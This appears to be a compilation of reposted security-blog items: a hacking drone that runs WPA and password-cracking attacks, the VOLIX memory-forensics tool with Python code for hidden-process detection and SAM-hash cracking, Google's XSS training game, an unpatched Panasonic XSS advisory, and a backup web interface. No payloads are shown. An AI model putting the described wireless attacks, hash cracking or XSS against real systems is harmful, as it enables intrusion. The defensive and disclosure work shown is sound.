The UAV also carries a 4G connection, giving the aircraft onboard Internet connectivity. This connection allows the operator to control the payload from anywhere in the world, including from mobile devices. It also allows processor-intensive applications, such as WPA attacks and password cracking, to be offloaded securely in real time to a remote computing powerhouse using CUDA technology, for mind-blowing performance.

Altogether, the UAV weighs approximately 13 pounds, with a length of 76 inches and a wingspan of 67 inches. Its flight time is approximately 30-45 minutes, with a maximum estimated altitude of around 22,000 feet. It flies a preprogrammed set of GPS coordinates, while collecting data, and returns to base. We can also interrupt the course, and cause the UAV to “loiter” around an interesting target, allowing us more time to investigate.
RedQueen: Mike Tassey is a security consultant to Wall Street and the US Intelligence Community. He spent the majority of his 16-year information security career in support of the Dept. of Defense (both in uniform and out) and now does security consulting for global companies and government. His interests include martial arts, lolcats, danger and putting large things in small airplanes.

WhiteQueen: Rich Perkins is an avid radio control enthusiast and a senior security engineer supporting the U.S. Government. He has had a 20-year Information Technology career including programming, Enterprise Administration and Information Security. Hobbies include hiking, SCUBA diving, R/C, computers and electronics, as well as a penchant for voiding warranties.

Source: https://rabbit-hole.org/about/

Volatility Interface & Extensions


This project aims to develop software that extends the use and simplifies the handling of the Volatility Framework.
Objectives of VOLIX:
  • Simplify the handling of Volatility
    • Provide a more intuitive GUI handling
    • Reduce complex command sequences to a single click
    • Improving usability
  • Increase analysis speed (no tedious typing of commands)
  • Make comparison and correlation of results easier
  • Offer assistance / examples
  • Provide new functions
  • Automated search for malware and analysis of the findings by VirusTotal
  • Detecting of hidden processes and network connections
  • Integrate existing and new plug-Ins
  • Provide a graphical analysis of images in the form of diagrams and/or statistics
  • Generate reports
  • *NEW* Complete support of the Volatility Framework 2.3.1
    • With all Linux and MacOS plugins
  • *NEW* Improved helpfile with a complete investigation example
  • *NEW* A questionnaire can be filled in, which VOLIX II analyses to decide which plugins to run
  • *NEW* The investigation is now mostly automated
  • *NEW* A new plugin will be started as soon as another one ends
    • Up to three plugins will run simultaneously
    • Results are parsed to set parameters for the plugins that are started next
  • *NEW* A complete final report can now be created at any time
  • *NEW* John the Ripper was integrated into Volix II to crack SAM hashes
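As an added illustration of the "detect hidden processes" item and of the pipeline that parses one plugin's results to parameterise the next (example code written for this page, not part of VOLIX or Volatility): a cross-view check over constructed Volatility 2.x `pslist` and `psscan` text output that flags processes carved from memory but absent from the kernel's process list, and builds the `--pid` value a follow-up plugin would be started with.

```python
import re

# Constructed sample of Volatility 2.x "pslist" output (walks the EPROCESS linked list).
PSLIST_OUT = """\
Offset(V)  Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
---------- -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0x823c89c8 System                    4      0     53      240 ------      0
0x822f1020 smss.exe                368      4      3       19 ------      0 2010-10-29 17:08:53 UTC+0000
0x82298700 explorer.exe           1464   1444     17      415      0      0 2010-10-29 17:11:32 UTC+0000
"""

# Constructed sample of "psscan" output (carves EPROCESS structures from physical memory,
# so it also sees unlinked and already-terminated processes).
PSSCAN_OUT = """\
Offset(P)          Name                PID   PPID PDB        Time created                   Time exited
------------------ ---------------- ------ ------ ---------- ------------------------------ ------------------------------
0x0000000002029ab8 System                4      0 0x00319000 2010-10-29 17:08:53 UTC+0000
0x00000000020f1020 smss.exe            368      4 0x0a6ec000 2010-10-29 17:08:53 UTC+0000
0x0000000002098700 explorer.exe       1464   1444 0x0a8e2000 2010-10-29 17:11:32 UTC+0000
0x00000000021a0b10 notepad.exe        2044   1464 0x0b4c1000 2010-10-29 17:09:40 UTC+0000 2010-10-29 17:10:02 UTC+0000
0x0000000002142da0 hidden.exe         1820   1464 0x0b1f3000 2010-10-29 17:12:05 UTC+0000
"""

# A data row starts with an offset, then name, PID and PPID; header and separator rows do not match.
ROW_RE = re.compile(r"^0x[0-9a-fA-F]+\s+(?P<name>.+?)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s")
TS_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")


def parse_process_table(text):
    """Map PID -> (name, exited) from a pslist/psscan text table.
    A row carrying two timestamps (created and exited) is a terminated process."""
    procs = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            exited = len(TS_RE.findall(line)) >= 2
            procs[int(m.group("pid"))] = (m.group("name").strip(), exited)
    return procs


def hidden_processes(pslist_text, psscan_text):
    """Cross-view check: present in the carved view, absent from the linked list, and not
    merely terminated. Survivors are candidates for DKOM-style hiding, sorted by PID."""
    listed = parse_process_table(pslist_text)
    scanned = parse_process_table(psscan_text)
    return sorted((pid, name) for pid, (name, exited) in scanned.items()
                  if pid not in listed and not exited)


def pid_argument(findings):
    """Comma-separated value for a follow-up plugin's --pid option, e.g. dlllist --pid 1820."""
    return ",".join(str(pid) for pid, _ in findings)


if __name__ == "__main__":
    suspects = hidden_processes(PSLIST_OUT, PSSCAN_OUT)
    print("hidden candidates:", suspects, "-> --pid", pid_argument(suspects))
```

On real images, a process that exited after the list walk and before the scan is the usual benign explanation for a psscan-only entry, so the exit-time filter above is what keeps the automated hand-off from chasing stale processes.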

Screenshots: Load RAM Image; Malware search; Malware results; *NEW* Crack SAM hashes; *NEW* Final report.
Information on the project:
  • The project started in Spring 2013 and is still ongoing.
  • Comments and suggestions are appreciated.
  • If you want to be kept informed about this project, subscribe to our Volix Newsletter (you need to register for that).
Members of the project team:
Current project members:
Patrick Bock
Rene Woelker
Former project members:
Steffen Logen
Manual (German)
Material from ARES 2012:
© FH Aachen (2011-2014)

Source: http://www.it-forensik.fh-aachen.de/projekte/volix/13

Warning: You are entering the XSS game area \o/

Welcome, recruit!

Cross-site scripting (XSS) bugs are one of the most common and dangerous types of vulnerabilities in Web applications. These nasty buggers can allow your enemies to steal or modify user data in your apps and you must learn to dispatch them, pronto!

At Google, we know very well how important these bugs are. In fact, Google is so serious about finding and fixing XSS issues that we are paying mercenaries up to $7,500 for dangerous XSS bugs discovered in our most sensitive products.

In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.

There will be cake at the end of the test.

Let me at 'em!


XSS on Panasonic

- XSS on Panasonic site -

Advisory: security.panasonic.com – Cross-Site Script Vulnerability (XSS)
Advisory ID:  969061
Author: Roberto Garcia (@1gbDeInfo)
Affected Software: Successfully tested on security.panasonic.com
Vendor URL: http://security.panasonic.com
Vendor Status: reported 2 times but not solved

Vulnerability Description
The website "security.panasonic.com" is prone to an XSS vulnerability.

This vulnerability involves the ability to inject arbitrary and unauthorized
javascript code. A malicious script inserted into a page in this manner can
hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page.


Disclosure Timeline
- Report vuln Jun 4, 2014 via email to samuel.garcia@ext.eu.panasonic.com
- Reported again via web Jun 12, 2014. They answered me:

        Dear Mr. Garcia,
        Thank you for your prompt e-mail reply.
        Regarding your enquiry, I am writing to confirm having forwarded your
        message to the corresponding department.

        Kind Regards,
        Customer Service Team
        Panasonic UK

Affected sites:
  - vftr.panasonic.co.jp
  - security.panasonic.com
  - panasonic.ney

Vulnerability found and advisory written by Roberto Garcia (@1gbDeInfo)

Best regards.
Roberto Garcia Amoriz
Linkedin: es.linkedin.com/in/rogaramo/
Web:  http://www.1gbdeinformacion.com
Twitter: @1gbdeinfo

Friday, June 20, 2014

Webrsnapshot - backup


Webrsnapshot is a web interface for rsnapshot programmed in Perl (Mojolicious), JS, CSS and HTML of course.

The Idea
I had the idea to implement some kind of GUI for rsnapshot since I'm using it. Even though I am an experienced Linux administrator, I find that in some cases such a GUI is much more useful than editing the text file over the console. The idea to implement some more features, like "restore" to the same or a custom path, got me started working on this project.
Until now I used the Windows backup, Mac's Time Machine and BackupPC. But none of them has proved itself like rsnapshot in robustness and simplicity. I mean, I had to live with such idiotic problems as the impossibility to restore a backup because the OS was updated and the connection encoding was changed, or the impossibility to restore a backup after the machine was reinstalled and some IDs had changed. With BackupPC I (still) have the problem that the files are stored in some kind of binary form and are not directly accessible over the file system, or you have to stop the currently running backup before you can restore some file. Well, I don't have so much time to waste on such idiotic things.
Since I have been using rsnapshot for years already, I decided to develop some kind of web interface. For a long time I was wondering what programming language to use, and it seems that Perl was the only reasonable one, because rsnapshot is Perl based, so Perl has to be installed on the backup server anyway. Webrsnapshot is based on the Mojolicious (Perl) web framework. On the other side this eliminates the need for a web server, because Mojolicious already has an HTTP and WebSocket client/server implementation with IPv6, TLS and so on.


Source: The Webrsnapshot source can be found on my GitHub: https://github.com/dobrevg/webrsnapshot

Download: git clone https://github.com/dobrevg/webrsnapshot.git <your-target-dir>

Demo: You can find a demo version here. While saving the configuration you may see some error messages, but that is fine: this is a read-only demo and it doesn't save the changes.

User/Pass are demo/demo.